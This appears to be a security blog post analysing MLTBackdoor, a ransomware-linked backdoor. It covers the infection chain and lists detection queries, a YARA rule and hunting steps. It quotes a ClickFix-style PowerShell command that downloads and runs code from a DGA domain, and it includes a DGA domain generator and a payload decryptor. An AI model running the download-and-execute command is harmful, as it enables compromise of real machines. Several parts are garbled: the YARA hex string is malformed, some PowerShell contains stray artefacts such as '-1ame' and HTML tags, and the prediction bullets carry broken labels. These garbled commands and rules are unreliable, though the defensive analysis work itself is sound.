MLTBackdoor Unmasked: Inside the Stealthy Ransomware-Linked Backdoor That Sideloads via Microsoft Defender + Video

By /

Listen to this Post

Featured Image

Introduction:

MLTBackdoor is a newly identified backdoor family observed in May 2026, likely used by ransomware-affiliated threat actors to establish initial access and support post-compromise activities including file manipulation, lateral movement, and modular task execution. This sophisticated malware leverages a ClickFix social engineering lure, RC4-encrypted payloads, and a custom TLS-based C2 protocol with ECDH P-256 and AES-256-GCM to evade detection while masquerading as legitimate Microsoft components via DLL sideloading.

Learning Objectives:

  • Understand the complete infection chain of MLTBackdoor, from ClickFix lure to second-stage payload execution.
  • Learn how to detect and mitigate MLTBackdoor using system monitoring, memory analysis, and network forensics.
  • Master hands-on techniques for analyzing RC4 decryption, indirect syscalls, and DLL sideloading attacks.

You Should Know:

  1. Dissecting the ClickFix Lure and Initial Execution Chain

The attack begins when a victim visits a compromised automotive-related webpage displaying a fake error or update prompt (the ClickFix lure). The user is tricked into copying and pasting a malicious command into PowerShell or Run dialog. Below is the typical command structure and step-by-step breakdown:

Malicious Command Example:

powershell.exe -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://dga-domain[.]xyz/update')"

Step‑by‑step guide – What this does and how to analyze it:

  1. User copies command from the fake error box (e.g., “Please run this to fix your driver”).
  2. Command launches conhost.exe as a headless process, hiding the console window.

3. Temporary folder creation: `mkdir %TEMP%\msupdates` or similar.

  1. Archive download: The command uses `certutil` or `bitsadmin` to fetch a ZIP or CAB archive from a DGA-generated domain (e.g., jh3kf92.xyz).
  2. Extraction and execution: The archive contains `endpointdlp.dll` and data.bin. `rundll32 endpointdlp.dll,2` is called.

6. Detection commands (Windows): Monitor process creation events:

wevtutil qe System /f:text /c:10 /rd:true /q:"[System[EventID=4688]]" | findstr "rundll32 conhost"

Or use Sysmon Event ID 1:

Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational';ID=1} | Where-Object {$_.Message -like "rundll32endpointdlp"}

2. RC4 Decryption of the Second-Stage Payload

The `endpointdlp.dll` acts as a loader. It reads data.bin, extracts an RC4 key and encrypted payload size from the header, then decrypts the remainder. The RC4 key is stored in plaintext within the payload header, making it recoverable for analysis.

Step‑by‑step guide – How to extract and decrypt the second-stage payload manually:

  1. Locate `data.bin` on an infected system (typically `%TEMP%` or %ProgramData%).

2. Parse header structure (example in Python):

import arc4

with open('data.bin', 'rb') as f:
header = f.read(12)  Example: 4 bytes key length, key, 4 bytes payload size
key_len = int.from_bytes(header[0:4], 'little')
rc4_key = header[4:4+key_len]
payload_size = int.from_bytes(header[4+key_len:8+key_len], 'little')
encrypted = f.read(payload_size)

cipher = arc4.ARC4(rc4_key)
decrypted = cipher.decrypt(encrypted)
with open('mltbackdoor.bin', 'wb') as out:
out.write(decrypted)

3. Analyze the decrypted binary using `strings` or IDA Pro:

strings mltbackdoor.bin | grep -i "c2|beacon|sleep"

4. Linux alternative: Use `rc4` tool or CyberChef with the extracted key.

3. Anti-Analysis Techniques and Runtime Protection

MLTBackdoor implements multiple anti-analysis checks: MBA (meaningless block aliasing), CFF (control flow flattening), stack-built strings, DJB2 API hashing to avoid import tables, indirect syscalls to bypass user-mode hooks, and checks for debuggers, sandboxes, and analysis tools.

Step‑by‑step guide – Bypassing anti-analysis and detecting evasion:

  1. Detect indirect syscalls using Windows ETW or kernel callbacks. Monitor `ntdll.dll` calls that skip user-land hooks: 
    fltmc instances | findstr "Sysmon"  Ensure Sysmon is active
  2. Use API Monitor to trace indirect syscalls (set filter on `Nt` functions).
  3. Disable anti-debug tricks in a sandbox by patching `IsDebuggerPresent` and NtQueryInformationProcess: 
    // Example x86 patch: mov eax, 0; ret
  4. Run the sample in a custom kernel-mode debugger (e.g., Windbg with VMWare plugins) to bypass user-mode checks.

5. Linux command to detect similar packed/obfuscated binaries:

file mltbackdoor.bin
strings -1 8 mltbackdoor.bin | grep -E "DJB2|rc4|aes"
  1. C2 Communication: TLS with ECDH P-256 and AES-256-GCM

MLTBackdoor establishes encrypted C2 over TLS, using a custom protocol where the session key is derived via ECDH P-256, then all traffic is encrypted with AES-256-GCM. It also implements DGA-based fallback domains if the primary C2 is unreachable.

Step‑by‑step guide – Extracting and simulating C2 traffic:

1. Capture network traffic using Wireshark with filter:

tls.handshake.extensions_server_name or tcp.port == 443

2. Decrypt TLS if you have the private key or use a man-in-the-middle proxy (Burp Suite with CA cert installed in the sandbox).
3. Identify DGA pattern by reverse-engineering the seed (often based on current date). Example Python to generate domains:

import time
import hashlib

def dga(date):
seed = int(time.mktime(date.timetuple())) // 86400
for i in range(5):
domain = hashlib.md5(f"{seed}{i}".encode()).hexdigest()[:12] + ".com"
print(domain)

4. Block DGA domains via DNS sinkhole or by adding to Windows hosts file:

echo 127.0.0.1 malicious-dga[.]xyz >> C:\Windows\System32\drivers\etc\hosts

5. DLL Sideloading via Legitimate Microsoft Defender Executable

After self-update, MLTBackdoor reuses the filename `endpointdlp.dll` and sideloads it through the legitimate Microsoft Defender executable mpextms.exe. This bypasses application whitelisting and trust checks.

Step‑by‑step guide – Preventing and detecting DLL sideloading:

  1. Monitor for `mpextms.exe` loading unexpected DLLs using Sysmon Event ID 7 (Image loaded): 
    Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational';ID=7} | Where-Object {$<em>.Message -like "mpextms.exe" -and $</em>.Message -like "endpointdlp.dll"}
  2. Enable DLL auditing via Group Policy: Computer Configuration → Windows Settings → Security Settings → Local Policies → Audit Policy → Audit Process Tracking.
  3. Use PowerShell to list loaded DLLs of a running mpextms.exe: 
    Get-Process -1ame mpextms | ForEach-Object { $_.Modules | Format-Table FileName, Company}
  4. Block sideloading by enforcing Microsoft’s recommended path: set `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs` to restrict DLL loading from non-system directories.

6. BOF Loader for In-Memory Module Execution

MLTBackdoor includes a Beacon Object File (BOF) loader, allowing the operator to execute additional in-memory modules (e.g., Mimikatz, Rubeus) without writing to disk. This is a technique borrowed from Cobalt Strike.

Step‑by‑step guide – Detecting BOF execution in memory:

  1. Monitor for anomalous `VirtualAlloc` and `CreateRemoteThread` calls using Event Tracing for Windows (ETW): 
    logman start "BOFDetect" -p {Microsoft-Windows-Kernel-Process} 0x10 0xFF -ets
  2. Use Volatility memory analysis on a memory dump to find injected code: 
    volatility3 -f memory.dmp windows.malfind.Malfind --pid <mpextms_pid>
  3. Scan for RWX memory regions with PowerShell and Windows API: 
    Get-Process -Id <PID> | Select-Object -ExpandProperty Modules | ForEach-Object { $_.BaseAddress }
Then use .NET reflection to query memory protection

7. Threat Hunting and Mitigation Recommendations

To proactively hunt for MLTBackdoor across your environment, implement the following YARA rule and log collection strategy.

YARA Rule Snippet for MLTBackdoor:

rule MLTBackdoor_Loader {
meta:
description = "Detects endpointdlp.dll loader"
date = "2026-05-15"
strings:
$rc4_header = { 52 43 34 4B 65 79 } // "RC4Key" pattern
$djb2_hash = { 0x50 0x65 0x72 0x73 0x48 0x61 0x73 0x68 }
$dll_name = "endpointdlp.dll" wide ascii
condition:
(uint16(0) == 0x5A4D) and ($rc4_header or $djb2_hash) and $dll_name
}

Step‑by‑step hunting guide:

  1. Collect Sysmon logs centrally (Event IDs 1, 3, 7, 11, 22).
  2. Query for `rundll32.exe` spawning from `conhost.exe` with suspicious command lines: 
    // KQL for Microsoft Sentinel
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine contains "endpointdlp.dll"
  3. Check for unsigned DLLs in `C:\ProgramData\Microsoft\Windows Defender\Platform\` (where `mpextms.exe` lives).
  4. Isolate infected hosts immediately and collect `data.bin` and `endpointdlp.dll` before remediation.

What Undercode Say:

  • Key Takeaway 1: The MLTBackdoor infection chain demonstrates a mature, modular approach that combines social engineering (ClickFix), staging with RC4 encryption, and living‑off‑the‑land techniques (DLL sideloading via Microsoft Defender) to evade endpoint detection.
  • Key Takeaway 2: Defenders must shift focus to behavioral monitoring—indirect syscalls, BOF loaders, and DGA‑based C2 require memory forensics and network anomaly detection, not just signature matching.

Analysis: MLTBackdoor reflects an escalating trend where ransomware groups adopt advanced evasion borrowed from red team tooling (Cobalt Strike BOF, indirect syscalls). The use of a legitimate Microsoft binary as a sideloading host complicates whitelisting and Application Control policies. Organizations lacking robust Sysmon, EDR with memory visibility, and network TLS inspection will likely miss this threat. The RC4 key embedded in the payload header is a weakness—defenders can extract and decrypt the second stage for deeper analysis. However, the custom AES-256-GCM over TLS with ECDH key exchange makes passive decryption nearly impossible without endpoint access. Proactive hunting should focus on anomalous `rundll32` behavior, conhost process chains, and DGA DNS queries. Additionally, the ClickFix lure targeting automotive industry sites suggests sector‑specific spearphishing; security awareness training must include copy‑paste risks.

Prediction:

  • -1 Ransomware groups will rapidly adopt MLTBackdoor’s techniques—especially DLL sideloading via signed Microsoft binaries—leading to a surge in supply chain and initial access broker activity throughout 2026-2027.
  • -P The security community will release automated decryption tools and YARA rules within weeks, but the modular BOF loader will evolve to use direct syscalls and kernel callbacks, further bypassing user‑mode EDR hooks.
  • -1 Small and medium businesses without 24/7 SOC or memory analysis capabilities will face disproportionate risk, as MLTBackdoor’s anti-sandbox and anti-analysis checks successfully evade most automated threat detection platforms.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Flavioqueiroz Malwareanalysis – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: